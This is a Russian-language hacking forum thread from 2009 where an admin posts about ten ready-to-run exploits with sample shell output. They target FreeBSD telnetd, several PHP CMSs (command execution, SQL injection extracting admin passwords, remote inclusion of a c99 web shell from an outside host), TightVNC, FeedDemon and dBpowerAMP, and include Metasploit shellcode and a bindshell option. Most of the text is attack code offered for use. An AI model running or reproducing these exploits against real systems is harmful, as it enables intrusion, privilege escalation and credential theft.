18:31
Обновить
Эксплойты - Форум
| RSS



[ Новые сообщения · Участники · Правила форума · Поиск · RSS ]
  • Страница 1 из 1
  • 1
Модератор форума: aka_kludge, LeadyTOR  
Форум » взЛОм » В сеТИ » Эксплойты (Сюда будут выкладываться эксплойты)
Эксплойты
aka_kludgeДата: Понедельник, 16.02.2009, 09:23 | Сообщение # 1
Admin
Группа: Администраторы
Сообщений: 1058
Награды: 2
Репутация: 25
Статус: Offline
Цель: FreeBSD 7.0, 7.1
Воздействие: Повышение привилегий

Описание уязвимости:

* Повышение привилегий в telnetd в FreeBSD

Код эксплоита:

---snip-----
# FreeBSD telnetd local/remote privilege escalation/code execution
# remote root only when accessible ftp or similar available
# tested on FreeBSD 7.0-RELEASE
# by Kingcope/2009

#include
#include
#include
#include

void _init() {
FILE *f;
setenv("LD_PRELOAD", "", 1);
system("echo ALEX-ALEX;/bin/sh");
}
---snip-----

Then we compile this stuff.

---snip-----
#gcc -o program.o -c program.c -fPIC
#gcc -shared -Wl,-soname,libno_ex.so.1 -o libno_ex.so.1.0 program.o
-nostartfiles
---snip-----

Then we copy the file to a known location (local root exploit)

---snip-----
#cp libno_ex.so.1.0 /tmp/libno_ex.so.1.0
---snip-----

...or we upload the library through any other available attack vector.
After that we telnet to the remote or local FreeBSD telnet daemon
with setting the LD_PRELOAD environment variable to the known location
as a telnet option before.

---snip-----
#telnet
>auth disable SRA
>environ define LD_PRELOAD /tmp/libno_ex.so.1.0
>open target
---snip-----
ALEX-ALEX
#ROOTSHELL

 
aka_kludgeДата: Понедельник, 16.02.2009, 09:24 | Сообщение # 2
Admin
Группа: Администраторы
Сообщений: 1058
Награды: 2
Репутация: 25
Статус: Offline
q-news 2.0 Remote Command Execution Exploit

Цель: q-news 2.0
Воздействие: Выполнение произвольных команд

Код эксплоита:

##########################################################################

Author = FireShot , Jacopo Vuga.
Mail = fireshotautisticiorg

Vulnerability = Remote Command Execution
Software = q-news 2.0
Download =
http://ovh.dl.sourceforge.net/sourceforge/php-box/2.0_nologin.zip

Greets to = Osirys for his friendship and his tips, Myral, str0ke

###########################################################################

Code


<?php
$filename = 'settings.php';
if (is_writable($filename)) {
     if (!$handle = fopen($filename, 'w')) {
          print "Cannot open file ($filename)";
          exit;
     }
if (!fwrite($handle, "<?php
   \$password = '$password';
   \$font = '$font';
   \$height = '$height';
   \$width = '$width';
   \$direction = '$direction';
   \$speed = '$speed';
   \$bgcolor = '$bgcolor';
   \$txtcolor = '$txtcolor';
   \$txtsize = '$txtsize';
   ?>")) {
         print "Cannot write to file ($filename)";
         exit;
     }
     print "Successfully saved settings to file ($filename)";
     fclose($handle);
                      
} else {
     print "The file $filename is not writable";
}
?>

[EXPLOIT]

#!/usr/bin/perl

use HTTP::Request;
use LWP::UserAgent;

my $host = $ARGV[0];
my $vuln = "/wsettings.php?speed=";
my $rce = "/settings.php?cmd=";
my $evil = "';system(\$_GET[cmd]);\$x = '";

my $inj_url = $host.$vuln.$evil;
my $rce_url = $host.$rce;

($host) || die " usage= perl $0 site \n";

print "------------------------\n";
print " Q-News RCE Exploit \n";
print " by FireShot \n";
print "------------------------\n\n";

$response = get($inj_url);
if ($response =~ /Successfully saved settings/) {
&shell;
}
else {
print "error \n";
exit(0);
}

sub shell {
print "FireShot-shell: ";
my $cmd = ;
$cmd !~ /quit/ || die " exit \n";
my $url = $rce_url.$cmd;
my $re = get($url);
if ($re =~ /(.)/) {
print $re;
}
else {
print "command unknow \n";
}
&shell;
}

sub get() {
my $url = $_[0];
my $req = HTTP::Request->new(GET => $url);
my $agent = LWP::UserAgent->new();
$agent->timeout(4);
my $response = $agent->request($req);
return $response->content;
}

[/EXPLOIT]

############################################################################

Управление Hyper-V
Автоматизация отклика, постоянное наблюдение, интерфейс консоли ММС

 
aka_kludgeДата: Понедельник, 16.02.2009, 09:25 | Сообщение # 3
Admin
Группа: Администраторы
Сообщений: 1058
Награды: 2
Репутация: 25
Статус: Offline
Hedgehog-CMS 1.21 (LFI) Remote Command Execution Exploit
Цель: Hedgehog-CMS 1.21
Воздействие: Выполнение произвольных команд

Код эксплоита:

#!/usr/bin/perl

# |----------------------------------------------------------------------------------------------------------------------------------|
# | INFORMATIONS |
# |----------------------------------------------------------------------------------------------------------------------------------|
# |Web Application : Hedgedog-CMS 1.21 |
# |Download : http://mesh.dl.sourceforge.net/sourcef.....21.zip |
# |----------------------------------------------------------------------------------------------------------------------------------|
# |Remote Command Execution Exploit |
# |by Osirys |
# |osirys[at]autistici[dot]org |
# |osirys.org |
# |Thx&Greets to: evilsocket, athum |
# |----------------------------------------------------------------------------------------------------------------------------------|
# |BUG [Local File Inclusion]
# | p0c : /[path]/includes/footer.php?c_temp_path=[lf]%00
# | In source $c_temp_path is not declared, so if register_globals = On we can set its value from GET directly.
# |----------------------------------------------------------------------------------------------------------------------------------|
# |BUG [Abitrary php code writing]
# | This cms is not coded too good, we can bypass admin login just doing it via socket or lwp with $_POST[l_mode].
# | From admin panel everything before beeing passed in a file is filtered with htmlspecialchars and other fucntions,
# | expect of the email contact variable, that's the hell bug.
# | The sploit before overwriting a previous configuration, tries to get the old one, then it executes your commands.
# |----------------------------------------------------------------------------------------------------------------------------------|

# ------------------------------------------------------------------
# Exploit in action [>!]
# ------------------------------------------------------------------
# osirys[~]>$ perl lolzo.txt http://localhost/hedgehog-cms/
#
# --------------------------------
# Hedgedog-CMS RCE Exploit
# by Osirys
# --------------------------------
#
#

  • Getting old configuration data ..
    #
  • Overwriting configuration data ..
    #
  • Overwrite succesfully !
    # [&] Hi my master, do your job now [!]
    #
    # shell[localhost]$> id
    # uid=80(apache) gid=80(apache) groups=80(apache)
    # shell[localhost]$> pwd
    # /home/osirys/web/hedgehog-cms/config
    # shell[localhost]$> la
    # bash: la: command not found
    # shell[localhost]$> exit
    # [-] Quitting ..
    # osirys[~]>$
    # ------------------------------------------------------------------

    use LWP::UserAgent;
    use IO::Socket;
    use HTTP::Request::Common;

    my $post_pag = "/specialacts.php";
    my $rce_path = "/config/userconfig.php";
    my $rce_c0de = "%22%3Bsystem%28%24_GET%5Bcmd%5D%29%3B+%24xy+%3D+%22";
    my $host = $ARGV[0];

    ($host) || help("-1");
    cheek($host) == 1 || help("-2");
    &banner;

    $datas = get_input($host);
    $datas =~ /(.*) (.*)/;
    ($h0st,$path) = ($1,$2);

    my $ua_url = $host.$post_pag;
    my $ua = LWP::UserAgent->new;
    my $re = $ua->request(POST $ua_url,
    Content_Type => 'multipart/form-data',
    Content => [l_mode => '33']
    );

    if ($re->is_success) {
    $data = $re->content;
    print "

  • Getting old configuration data ..\n";
    get_old_data($data);
    &overwrite;
    }
    else {
    print "[-] Unable to get old configuration data ..\n";
    print "
  • Overwriting existing configuration ! \n";
    &overwrite;
    }

    sub overwrite {
    if ($old_data_gotcha != 1) {
    $title = "Website";
    $username = "Username";
    $contact = "admin\@admin.com";
    $copyright = "2007 website";
    }

    my $url = $path.$post_pag;

    my $code= "e_maintitle=". $title."&e_autor=".$username."&e_contact=". $contact. $rce_c0de.
    "&e_copyright=".$copyright."&e_theme=.%2Ftemp%2Fstrawberry%2F&e_language=engli".
    "sh.lng&e_favicon=&e_sp=true&e_version=true&e_guestbook=true&l_mode=35";

    my $length = length($code);

    my $data = "POST ".$url." HTTP/1.1\r\n".
    "Host: ".$h0st."\r\n".
    "Keep-Alive: 300\r\n".
    "Connection: keep-alive\r\n".
    "Content-Type: application/x-www-form-urlencoded\r\n".
    "Content-Length: ".$length."\r\n\r\n".
    $code."\r\n";

    my $socket = new IO::Socket::INET(
    PeerAddr => $h0st,
    PeerPort => '80',
    Proto => 'tcp',
    ) or die "[-] Can't connect to $h0st:80\n[?] $! \n\n";

    print "

  • Overwriting configuration data ..\n";
    $socket->send($data);

    while ((my $e = <$socket>)&&($own != 1)) {
    if ($e =~ /The configurations have been saved successfully/) {
    print "

  • Overwrite succesfully !\n";
    $own = 1;
    }
    }

    $own == 1 || die "[-] Can't overwrite configuration data !\n";

    print "[&] Hi my master, do your job now [!]\n\n";
    &exec_cmd;
    }

    sub exec_cmd {
    my(@outs,$out);
    $h0st !~ /www\./ || $h0st =~ s/www\.//;
    print "shell[$h0st]\$> ";
    $cmd = ;
    $cmd !~ /exit/ || die "[-] Quitting ..\n";
    $exec_url = $host.$rce_path."?cmd=".$cmd;
    $re = get_req($exec_url);
    if ($re =~ /./) {
    print $re;
    &exec_cmd;
    }
    else {
    $c++;
    $cmd =~ s/\n//;
    print "bash: ".$cmd.": command not found\n";
    $c < 3 || die "[-] Command are not executed.\n[-] Something wrong. Exploit Failed !\n\n";
    &exec_cmd;
    }
    }

    sub get_req() {
    $link = $_[0];
    my $req = HTTP::Request->new(GET => $link);
    my $ua = LWP::UserAgent->new();
    $ua->timeout(4);
    my $response = $ua->request($req);
    return $response->content;
    }

    sub cheek() {
    my $host = $_[0];
    if ($host =~ /http:\/\/(.*)/) {
    return 1;
    }
    else {
    return 0;
    }
    }

    sub get_input() {
    my $host = $_[0];
    $host =~ /http:\/\/(.*)/;
    $s_host = $1;
    $s_host =~ /([a-z.-]{1,30})\/(.*)/;
    ($h0st,$path) = ($1,$2);
    $path =~ s/(.*)/\/$1/;
    $full_det = $h0st." ".$path;
    return $full_det;
    }

    sub get_old_data() {
    my $re = $_[0];
    if ($re =~ /name="e_maintitle" value="(.*)" size/) { $title = $1; }
    if ($re =~ /name="e_autor" value="(.*)" size/) { $username = $1; }
    if ($re =~ /name="e_contact" value="(.*)" size/) { $contact = $1; }
    if ($re =~ /name="e_copyright" value="(.*)" size/) { $copyright = $1; }
    $old_data_gotcha = 1;
    }

    sub banner {
    print "\n".
    " -------------------------------- \n".
    " Hedgedog-CMS RCE Exploit \n".
    " by Osirys \n".
    " -------------------------------- \n\n";
    }

    sub help() {
    my $error = $_[0];
    if ($error == -1) {
    &banner;
    print "\n[-] Bad hostname! \n";
    }
    elsif ($error == -2) {
    &banner;
    print "\n[-] Bad hostname address !\n";
    }
    print "

  • Usage : perl $0 http://hostname/cms_path \n\n";
    exit(0);
    }

    Компания Perao
    Perao - широкий набор услуг по VPN.

  •  
    aka_kludgeДата: Понедельник, 16.02.2009, 09:26 | Сообщение # 4
    Admin
    Группа: Администраторы
    Сообщений: 1058
    Награды: 2
    Репутация: 25
    Статус: Offline
    TightVNC Authentication Failure Integer Overflow PoC

    12 февраля, 2009

    Цель: TightVNC
    Воздействие: Отказ в обслуживании

    Код эксплоита:

    #!/usr/bin/env python

    #digital.desi@in.com

    # Modified Andres Lopez Luksenberg's exploit for Authentication Failure scenario in TightVNC. BID 33569 CVE-2009-0388

    import socket

    serversocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    serversocket.bind(('', 5900))
    serversocket.listen(1)

    while True:
    clientsocket, clientaddres = serversocket.accept()

    data = 'RFB 003.008\n'
    clientsocket.sendall(data)

    data_cli = clientsocket.recv(1024)
    print data_cli

    data = '\x02\x02\x10'
    clientsocket.sendall(data)

    data_cli = clientsocket.recv(1024)

    data = '\x00'*4
    clientsocket.sendall(data)

    data = ('\x00'*3)+'\x01'
    clientsocket.sendall(data)

    data = ('\x00'*3)+'\x02STDVVNCAUTH_'
    clientsocket.sendall(data)

    data_cli = clientsocket.recv(1024)

    data = ('\x01'*16)
    clientsocket.sendall(data)

    data_cli = clientsocket.recv(1024)

    data = '\x00\x00\x00\x01'
    clientsocket.sendall(data)

    data = '\xf0\xff\xff\xff'
    clientsocket.sendall(data)

    data = 'A'*10000
    clientsocket.sendall(data)

    clientsocket.close()
    serversocket.close()

    Управление Hyper-V
    Автоматизация отклика, постоянное наблюдение, интерфейс консоли ММС

     
    aka_kludgeДата: Понедельник, 16.02.2009, 09:28 | Сообщение # 5
    Admin
    Группа: Администраторы
    Сообщений: 1058
    Награды: 2
    Репутация: 25
    Статус: Offline
    FeedDemon <=2.7 OPML Outline Tag Buffer Overflow Exploit

    12 февраля, 2009

    Цель: FeedDemon 2.7 и более ранние версии
    Воздействие: Выполнение произвольного кода

    Описание уязвимости:

    * Переполнение буфера в FeedDemon

    Код эксплоита:

    #!/usr/local/bin/perl
    #-----------------------------------------------------------------------------
    # FeedDemon version 2.7.0.0 Buffer overFlow
    # Reference:
    # http://security.bkis.vn/?p=329
    # http://www.securityfocus.com/bid/33630/info
    # http://secunia.com/advisories/33718/
    # Tested in Windows XP Sp2 (English)
    # Created by cenjan (xcenjanx@yahoo.com)
    # Description: + This code generates a opml file (feeddemonexploit.opml)
    # + Import that file by the Import Feed function of Feed Demon
    # + The calc.exe will execute
    #-----------------------------------------------------------------------------
    my $head=' # Shellcode by Metasploit
    my $devil=
    "\x31\xC9\x83\xE9\xDE\xD9\xEE\xD9\x74\x24\xF4\x5B\x81\x73\x13\xEC".
    "\x2D\x36\x5E\x83\xEB\xFC\xE2\xF4\x10\xC5\x72\x5E\xEC\x2D\xBD" .
    "\x1B\xD0\xA6\x4A\x5B\x94\x2C\xD9\xD5\xA3\x35\xBD\x1\xCC\x2C".
    "\xDD\x17\x67\x19\xBD\x5F\x2\x1C\xF6\xC7\x40\xA9\xF6\x2A\xEB".
    "\xEC\xFC \x53\xED\xEF\xDD\xAA\xD7\x79\x12\x5A\x99\xC8\xBD\x1".
    "\xC8\x2C\xDD\x38\x67\x21\x7D\xD5\xB3\x31\x37\xB5\x67\x31\xBD".
    "\x5F\x7\xA4\x6A\x7A \xE8\xEE\x7\x9E\x88\xA6\x76\x6E\x69\xED".
    "\x4E\x52\x67\x6D\x3A\xD5\x9C\x31\x9B\xD5\x84\x25\xDD\x57\x67".
    "\xAD\x86\x5E\xEC\x2D\xBD\x36\xD 0\x72\x7\xA8\x8C\x7B\xBF\xA6".
    "\x6F\xED\x4D\xE\x84\xDD\xBC\x5A\xB3\x45\xAE\xA0\x66\x23\x61".
    "\xA1\xB\x4E\x57\x32\x8F\x2D\x36\x5E\x90\x90 \x90\x90\x90\x90".
    "\x90\x90\xED\x1E\x94\x7C\x90\x90\x90\x90\x90\x90\x90\x90\x90".
    "\x90\x90\x90\x90\x90\x89\xE1\xFE\xCD\xFE\xCD\xFE\xCD\x FE\xCD".
    "\xFE\xCD\xFE\xCD\x89\xCC\xFF\xE4";

    my $tail='">';
    open (f,'>feeddemonexploit.opml');
    print f "\xff\xfe";
    close(f);

    open (f,'>>:encoding(ucs-2le)','feeddemonexploit.opml');
    print f $head;
    close(f);

    open (f,'>>feeddemonexploit.opml');
    print f $overflow;
    print f $devil;
    close(f);

    open (f,'>>:encoding(ucs-2le)','feeddemonexploit.opml');
    print f $tail;
    close (f);
    print "Create exploit file successfully!";

     
    aka_kludgeДата: Понедельник, 16.02.2009, 09:28 | Сообщение # 6
    Admin
    Группа: Администраторы
    Сообщений: 1058
    Награды: 2
    Репутация: 25
    Статус: Offline
    PHP Director <= 0.21 Remote Command Execution Exploit

    12 февраля, 2009

    Цель: PHP Director 0.21 и более ранние версии
    Воздействие: Выполнение произвольных команд

    Код эксплоита:

    --+++===================================================================+++--
    --+++====== PHP Director <= 0.21 Remote Command Execution Exploit ======+++--
    --+++===================================================================+++--

    #!/usr/bin/perl

    use strict;
    use warnings;
    use IO::Socket;

    sub clear
    {
    my $out = $_ [0];
    $out =~ s/.+?xx//;
    $out =~ s/xx.+//;
    return $out;
    }

    sub usage
    {
    print "\nPHP Director <= 0.21 Remote Command Execution Exploit".
    "\n[+] Author: darkjoker".
    "\n[+] Site : http://darkjoker.net23.net ".
    "\n[+] Download: http://downloads.sourceforge.net/phpdire....irror=0 ".
    "\n[+] Usage : perl ${0} ".
    "\n[+] Ex. : perl ${0} localhost /PHPDirector /opt/lampp/htdocs/PHPDirector".
    "\n[+] Notes : must be the same directory where CMS is hosted".
    "\n\n";
    exit ();
    }

    sub send_shell
    {
    my ($host, $path, $disc_path) = @_;
    my $sock = new IO::Socket::INET (
    PeerHost => $host,
    PeerPort => 80,
    Proto => "tcp",
    ) or die "[-] Exploit failed.\n";
    my $sql_code = "searching=x' UNION SELECT 1,'xx "?>xx', 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15 INTO ".
    "OUTFILE '${disc_path}/shell.php' FROM pp_files#";
    my $post = "POST ${path}/index.php HTTP/1.1\r\n".
    "Host: ${host}\r\n".
    "Connection: Close\r\n".
    "Content-Length: ". length ($sql_code) . "\r\n".
    "Content-Type: application/x-www-form-urlencoded\r\n\r\n".
    $sql_code;
    print $sock $post;
    close ($sock);
    }

    my ($host, $path, $disc_path) = @ARGV;
    usage unless ($disc_path);
    $disc_path = "../"x10 . $disc_path;
    send_shell ($host, $path, $disc_path);
    print "Delete this shell after use.\n'quit' command to exit\n\n";
    my $cmd;
    while (1)
    {
    print "backdoor\@${host}: \$ ";
    $cmd = ;
    chomp $cmd;
    $cmd =~ s/ /%20/g;
    exit if ($cmd =~ /quit/);
    my $sock = new IO::Socket::INET (
    PeerHost => $host,
    PeerPort => 80,
    Proto => "tcp",
    );
    my $get = "GET ${path}/shell.php?cmd=${cmd}\r\n\r\n";
    print $sock $get;
    my $x;
    $x .= $_ while (<$sock>);
    $x = clear ($x);
    print $x;
    close ($sock);
    }

     
    aka_kludgeДата: Понедельник, 16.02.2009, 09:30 | Сообщение # 7
    Admin
    Группа: Администраторы
    Сообщений: 1058
    Награды: 2
    Репутация: 25
    Статус: Offline
    IF-CMS <= 2.0 (frame.php id) Blind SQL Injection Exploit

    12 февраля, 2009

    Цель: IF-CMS 2.0 и более ранние версии
    Воздействие: SQL-инъекция

    Код эксплоита:

    --+++=======================================================+++--
    --+++====== IF-CMS <= 2.0 Blind SQL Injection Exploit ======+++--
    --+++=======================================================+++--

    function query ($username, $char, $pos)
    {
    //Increase benchmark when exploit prints uncorrect passwords

    $query = "x' OR IF ((ASCII(SUBSTRING((SELECT pass FROM rns_admin WHERE ".
    "nick = '{$username}'),{$pos},1))={$char}), BENCHMARK(100000000,CHAR(0)),0) OR '1' = '2";
    $query = str_replace (" ", "%20", $query);
    $query = str_replace ("'", "%27", $query);
    return $query;
    }

    function exploit ($hostname, $path, $username, $char, $pos)
    {
    $char = ord ($char);
    $fp = fsockopen ($hostname, 80);
    $get = "GET {$path}/frame.php?id=". query ($username, $char, $pos) . " HTTP/1.1\r\n".
    "Host: {$hostname}\r\n".
    "Connection: Close\r\n\r\n";
    $a = time ();
    fputs ($fp, $get);
    while (!feof ($fp))
    fgets ($fp, 1024);

    fclose ($fp);
    $a = time () - $a;
    if ($a > 4)
    return true;
    else
    return false;

    }

    function usage ()
    {
    echo "\nIF-CMS <= 2.0 Blind SQL Injection Exploit".
    "\n[+] Author : darkjoker".
    "\n[+] Site : http://darkjoker.net23.net ".
    "\n[+] Download: http://downloads.sourceforge.net/if-cms....irror=0 ".
    "\n[+] Usage : php xpl.php ".
    "\n[+] Ex. : php xpl.php localhost /IF-CMS root".
    "\n\n";
    exit ();
    }

    if ($argc != 4)
    usage ();
    $hostname = $argv [1];
    $path = $argv [2];
    $user = $argv [3];
    //Edit this keylist when returned password is incomplete and add other characters you want
    $key = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789";
    $chr = 0;
    $pos = 1;
    echo "[+] Password: ";
    while ($chr < strlen ($key))
    {
    if (exploit ($hostname, $path, $user, $key [$chr], $pos))
    {
    echo $key [$chr];
    $chr = 0;
    $pos++;
    }
    else
    $chr++;
    }
    echo "\n\n";
    ?>

     
    aka_kludgeДата: Понедельник, 16.02.2009, 09:30 | Сообщение # 8
    Admin
    Группа: Администраторы
    Сообщений: 1058
    Награды: 2
    Репутация: 25
    Статус: Offline
    1024 CMS <= 1.4.4 Remote Command Execution with RFI (c99) Exploit

    12 февраля, 2009

    Цель: 1024 CMS 1.4.4 и более ранние версии
    Воздействие: Выполнение произвольных команд

    Описание уязвимости:

    * Множественные уязвимости в 1024 CMS

    Код эксплоита:

    #!/usr/bin/perl
    ####################################################################
    # 1024 CMS <= 1.4.4 Remote Command Execution with RFI (c99) Exploit
    # download: http://www.trebledesigns.com/1024cms.zip
    #
    # Author: JosS
    # mail: sys-project[at]hotmail[dot]com
    # site: http://www.hack0wn.com/
    # team: Spanish Hackers Team - [SHT]
    #
    # Hack0wn Security Project!!
    #
    # This was written for educational purpose. Use it at your own risk.
    # Author will be not responsible for any damage.
    #
    ####################################################################
    #
    # "need" allow_url_include = On && register_globals = On
    #
    # RFI vuln!: [/themes/default/layouts/standard.php]
    # # if($page_ck['custom'] == 'N' || isset($page_include)) {
    # if(!isset($page_include)) include("./pages/".$page."/default/content.php");
    # else include($page_include);
    # } else {
    # ...
    #
    ####################################################################
    # OUTPUT: (tested on localhost)
    #
    # [shell]:~$ id
    # uid=33(www-data) gid=33(www-data) groups=33(www-data)
    # [shell]:~$ uname -a
    # Linux h4x0rz 2.6.18-6-686 #1 SMP Fri Dec 12 16:48:28 UTC 2008 i686 GNU/Linux
    # [shell]:~$ exit
    # h4x0rz:/home/joss/Desktop#

    use LWP::UserAgent;
    use HTTP::Request;
    use LWP::Simple;
    use Getopt::Long;

    sub clear{
    system(($^O eq 'MSWin32') ? 'cls' : 'clear');
    }

    &clear();

    sub banner {
    &clear();
    print "[x] 1024 CMS <= 1.4.4 Remote Command Execution with RFI (c99) Exploit\n";
    print "[x] Written By JosS\n";
    print "[x] sys-project[at]hotmail[dot]com\n\n";
    print "[+] Usage:\n";
    print "[+] $0 -vuln \"web+path\" -shell \"shell\"\n";
    print "[+] eX: $0 -vuln \"http://www.hack0wn.com/test/\" -shell \"http://hack0wn.com/c99.txt?\"\n\n";
    exit();
    }

    my $options = GetOptions (
    'help!' => \$help,
    'vuln=s' => \$vuln,
    'shell=s' => \$shell
    );

    &banner unless ($vuln);
    &banner unless ($shell);

    &banner if $banner eq 1;

    chomp($vuln);
    chomp($shell);

    while (){

    print "[shell]:~\$ ";
    chomp($cmd=);

    if ($cmd eq "exit" || $cmd eq "quit") {
    exit 0;
    }

    my $ua = LWP::UserAgent->new;
    $iny="?&act=cmd&cmd=" . $cmd . "&d=/&submit=1&cmd_txt=1";
    chomp($iny);
    my $own = $vuln . "/themes/default/layouts/standard.php?page_include=" . $shell . $iny;
    chomp($own);
    my $req = HTTP::Request->new(GET => $own);
    my $res = $ua->request($req);
    my $con = $res->content;
    if ($res->is_success){
    print $1,"\n" if ( $con =~ m/readonly> (.*?)\<\/textarea>/mosix);
    }
    else
    {
    print "[p0c] Exploit failed\n";
    exit(1);
    }
    }

    # __h0__

     
    aka_kludgeДата: Понедельник, 16.02.2009, 09:30 | Сообщение # 9
    Admin
    Группа: Администраторы
    Сообщений: 1058
    Награды: 2
    Репутация: 25
    Статус: Offline
    Simple PHP News 1.0 Remote Command Execution Exploit

    10 февраля, 2009

    Цель: Simple PHP News 1.0
    Воздействие: Выполнение произвольных команд

    Код эксплоита:

    * Simple PHP News-expl.pl

    #!/usr/bin/perl

    # -----------------------------------------------------------------------------
    # INFORMATIONS
    # -----------------------------------------------------------------------------

    # App => Simple PHP News 1.0 Final
    # Downl => http://www.hotscripts.com/jump.php?listing_id=66376&jump_type=1

    # Remote Command Execution Exploit
    # by Osirys
    # osirys[at]autistici[dot]org
    # osirys.org
    # Thx&Greets to: evilsocket

    # A personal comment : just bleah !!

    # Tested with: Magic Quotes => Off

    # ------------------------------------------------------------------
    # Exploit in action [>!]
    # ------------------------------------------------------------------
    # osirys[~]>$ perl rce_lol.txt http://localhost/php_simple_news/

    # ---------------------------------
    # Simple PHP News RCE Exploit
    # by Osirys
    # ---------------------------------

    #

  • Adding new evil news ..
    #
  • RCE Created !
    # [&] Hi my master, do your job now [!]

    # shell[localhost]$> id
    # uid=80(apache) gid=80(apache) groups=80(apache)
    # shell[localhost]$> pwd
    # /home/osirys/web/php_simple_news
    # shell[localhost]$> exit
    # [-] Quitting ..
    # osirys[~]>$
    # ------------------------------------------------------------------

    use LWP::UserAgent;
    use IO::Socket;
    use HTTP::Request::Common;

    my $post_pag = "/post.php";
    my $rce_path = "/display.php";
    my $rand = int(rand 99) +1;
    my $host = $ARGV[0];

    ($host) || help("-1");
    cheek($host) == 1 || help("-2");
    &banner;

    $datas = get_input($host);
    $datas =~ /(.*) (.*)/;
    ($h0st,$path) = ($1,$2);

    my $date = &date;
    my $url = $path.$post_pag;

    my $code = "title=Shout&date=".$date. "&post=%3C%3Fphp%0D%0Aecho+".
    "%22shoutZ0".$rand."%22%3B%0D%0Aif%28get_magic_quotes_".
    "gpc%28%29%29%7B%0D%0A+++%24_GET%5Bcmd%5D%3Dstripslash".
    "es%28%24_GET%5Bcmd%5D%29%3B%0D%0A%7D%0D%0Asystem%28%2".
    "4_GET%5Bcmd%5D%29%3B%0D%0Aecho+%22-0Ztuohs".$rand."%2".
    "2%3B%0D%0A%3F%3E";

    my $length = length($code);

    my $data = "POST ".$url." HTTP/1.1\r\n".
    "Host: ".$h0st."\r\n".
    "Keep-Alive: 300\r\n".
    "Connection: keep-alive\r\n".
    "Content-Type: application/x-www-form-urlencoded\r\n".
    "Content-Length: ".$length."\r\n\r\n".
    $code."\r\n";

    my $socket = new IO::Socket::INET(
    PeerAddr => $h0st,
    PeerPort => '80',
    Proto => 'tcp',
    ) or die "[-] Can't connect to $h0st:80\n[?] $! \n\n";

    print "

  • Adding new evil news ..\n";
    $socket->send($data);

    while ((my $e = <$socket>)&&($own != 1)) {
    if ($e =~ /Entry added successfully/) {
    $own = 1;
    print "

  • RCE Created ! \n";
    }
    }
    $own == 1 || die "[-] Can't send new news !\n";

    print "[&] Hi my master, do your job now [!]\n\n";
    &exec_cmd;

    sub exec_cmd {
    my(@outs,$out);
    $h0st !~ /www\./ || $h0st =~ s/www\.//;
    print "shell[$h0st]\$> ";
    $cmd = ;
    $cmd !~ /exit/ || die "[-] Quitting ..\n";
    $exec_url = $host.$rce_path."?cmd=".$cmd;
    $re = get_req($exec_url);
    $content = tag($re);
    if ($content =~ /shoutZ0$rand(.*)-0Ztuohs$rand/) {
    $out = $1;
    @outs = split //, $out;
    foreach my $e(@outs) {
    $e =~ s/\*/\n/;
    print $e;
    }
    &exec_cmd;
    }
    elsif ($content =~ /shoutZ0$rand-0Ztuohs$rand/) {
    $c++;
    $cmd =~ s/\n//;
    print "bash: ".$cmd.": command not found\n";
    $c < 3 || die "[-] Command are not executed.\n[-] Something wrong. Exploit Failed !\n\n";
    &exec_cmd;
    }
    }

    sub date {
    my $year = (localtime)[5] + 1900;
    my $month = (localtime)[4];
    my $day = (localtime)[3];
    $month =~ s/([0-9]{1})/0$1/ if ($month =~ /[0-9]{1}/);
    $day =~ s/([0-9]{1})/0$1/ if ($day =~ /[0-9]{1}/);
    my $date = $month."/".$day."/".$year;
    return($date);
    }

    sub get_req() {
    $link = $_[0];
    my $req = HTTP::Request->new(GET => $link);
    my $ua = LWP::UserAgent->new();
    $ua->timeout(4);
    my $response = $ua->request($req);
    return $response->content;
    }

    sub cheek() {
    my $host = $_[0];
    if ($host =~ /http:\/\/(.*)/) {
    return 1;
    }
    else {
    return 0;
    }
    }

    sub get_input() {
    my $host = $_[0];
    $host =~ /http:\/\/(.*)/;
    $s_host = $1;
    $s_host =~ /([a-z.-]{1,30})\/(.*)/;
    ($h0st,$path) = ($1,$2);
    $path =~ s/(.*)/\/$1/;
    $full_det = $h0st." ".$path;
    return $full_det;
    }

    sub tag() {
    my $string = $_[0];
    $string =~ s/\n/\*/g;
    return($string);
    }

    sub banner {
    print "\n".
    " --------------------------------- \n".
    " Simple PHP News RCE Exploit \n".
    " by Osirys \n".
    " --------------------------------- \n\n";
    }

    sub help() {
    my $error = $_[0];
    if ($error == -1) {
    &banner;
    print "\n[-] Bad hostname! \n";
    }
    elsif ($error == -2) {
    &banner;
    print "\n[-] Bad hostname address !\n";
    }
    print "

  • Usage : perl $0 http://hostname/cms_path \n\n";
    exit(0);
    }
  •  
    aka_kludgeДата: Понедельник, 16.02.2009, 09:33 | Сообщение # 10
    Admin
    Группа: Администраторы
    Сообщений: 1058
    Награды: 2
    Репутация: 25
    Статус: Offline
    dBpowerAMP Audio Player 2 .PLS File Local Buffer Overflow Exploit

    10 февраля, 2009

    Цель: dBpowerAMP Audio Player 2
    Воздействие: Выполнение произвольного кода

    Описание уязвимости:

    * Удаленное выполнение произвольного кода в dBpowerAMP Audio Player

    Код эксплоита:

    * dBpowerAMP-expl.c

    /*
    * simo36.c
    * CODED By SimO-s0fT (Morrocco-->marrakesh city)
    * Home : Exploiter-ma.com
    * e-mail: maroc-anti-connexion[at]hotmail.com[dot]com
    *greetz : Stack & Djekmani4ever & alphanix & all friends
    * dBpowerAMP Audio Player local buffer overflow exploit
    *
    * this feat was exploit windows trus sp2
    * there is a small problem on the farm but fortunately I managed to use it
    * and remember that this feat has been operating as trus win
    * I test and winxp sp1 I found another problem
    * example:
    &&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&
    &&&&& G:\Documents and Settings\SimO\Bureau>simo simo36.pls &&&&&
    &&&&& ################################################################ &&&&&
    &&&&& dBpowerAMP Audio Player local buffer overflow exploit &&&&&
    &&&&& Coded By SimO-s0fT &&&&&
    &&&&& e-mail : simo[at]exploiter-ma[dot]com &&&&&
    &&&&& ################################################################ &&&&&
    &&&&& USAGE : simo36.exe simo.pls &&&&&
    &&&&& [1] execute calc.exe &&&&&
    &&&&& [2] execute bindshell LPORT=7777 &&&&&
    &&&&& ################################################################ &&&&&
    &&&&& enter 2 &&&&&
    &&&&& created !! &&&&&
    &&&&& openit with dBpowerAMP &&&&&
    &&&&& &&&&&
    &&&&& G:\Documents and Settings\SimO>telnet 127.0.0.1 7777 &&&&&
